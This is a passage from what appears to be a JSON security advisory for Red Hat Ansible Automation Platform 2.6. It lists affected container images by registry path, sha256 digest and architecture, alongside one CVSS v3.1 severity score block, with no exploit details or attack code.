"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
